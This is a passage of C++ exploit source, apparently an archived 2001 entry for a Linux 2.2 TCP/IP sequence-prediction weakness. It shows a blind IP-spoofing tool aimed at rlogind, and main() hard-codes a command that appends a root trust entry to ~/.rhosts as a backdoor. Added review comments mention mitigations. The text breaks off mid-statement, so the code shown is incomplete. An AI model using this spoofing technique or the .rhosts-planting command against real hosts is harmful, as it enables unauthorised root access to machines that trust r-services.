# Title : Linux Kernel 2.2 (TCP/IP Weakness) Exploit
# Published : 2001-01-02
# Author : Stealth
/**
*** Exploit for the 2.2 linux-kernel TCP/IP weakness.
*** (C) 1999 by S. Krahmer.
*** THERE IS ABSOLUTELY NO WARRANTY. YOU USE IT AT YOUR OWN RISK!
*** THIS PROGRAM IS LICENSED UNDER THE GPL and belongs to a security-
*** advisory of team teso. You should get the full advisory with paper
*** on either
*** http://www.cs.uni-potsdam.de/homepages/students/linuxer or
*** http://teso.scene.at
***
*** The bug discovery and the exploit are due to:
***
*** Stealth http://www.kalug.lug.net/stealth
*** S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linxuer
***
*** c++ blindSpoof.cc -lusi++ -lpcap (this is LINUX source!)
*** Libusi++ is available on my homepage.
*** Achtung: Gehen Sie nicht in den 100 Meilen tiefen Wald! ;-)
**/
#include <stdio.h>
#include <iostream>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <usi++/usi++.h>
// Destination TCP port of the spoofed connection. 513/tcp is the well-known
// rlogin ("login") service port, which is what the EXPLOIT_RLOGIND path below
// relies on; with EXPLOIT_RLOGIND undefined the port is just the spoofing target.
#define XPORT 513
// may be changed, my best results were around 2000,
// but also diffs of > 5000 can happen :)
// change it if it really does not work
// Tuning constant: going by the author's comments about "diffs" it bounds how far
// the tool is willing to search (presumably in guessed sequence-number space)
// before giving up — the use site is not in this excerpt, so confirm there.
// NOTE(review): this is the classic ISN-predictability weakness; kernels that
// randomize initial sequence numbers (RFC 6528 style) are the mitigation.
#define MAXPACK 3000
// define this if you want to exploit rlogind
// if not, you will just spoof a connection to XPORT
// Compile-time switch tested with #ifdef in main(); it must remain a macro.
// Defender note: the rlogind path abuses host-based .rhosts trust (see the
// hard-coded command in main()); disabling the r-services removes that trust path.
#define EXPLOIT_RLOGIND
// uses eth0 for packet-capturing!
// Forward declarations only — the definitions are outside this excerpt.
// Argument order matches the argv order used in main():
//   pingVictum(destination, source, spoofed); returns a libusi++ TCP object
//   (ownership/lifetime not visible here — presumably caller-owned; verify).
TCP *pingVictum(char *, char *, char *);
// Prints packet details; return-value meaning not visible in this excerpt.
int printInfo(TCP *);
// Presumably tells whether a captured packet is not the one being waited for;
// the comparison criteria live in the definition, which is not shown here.
bool wrongPacket(TCP *, TCP *);
int main(int argc, char **argv)
{
// yes, script-kidz! this is hardcoded to prevent you from usage.
const char *remoteUser = "stealth",
*localUser = "stealth",
*command = "echo liane root>>~/.rhostsn";
char sbuf[1000];
if (argc < 4) {
printf("Usage %s [destination-IP] [source-IP] [spoofed-IP]n", argv[0]);
exit(1);
}
cout<<"blindSpoof-exploit by S. Krahmern"
"http://www.cs.uni-potsdam.de/homepages/students/linuxernn";
// would be connect()
TCP *conn = pingVictum(argv[1], argv[2], argv[3]);
#ifdef EXPLOIT_RLOGIND
conn->set_flags(0);
sprintf(sbuf, "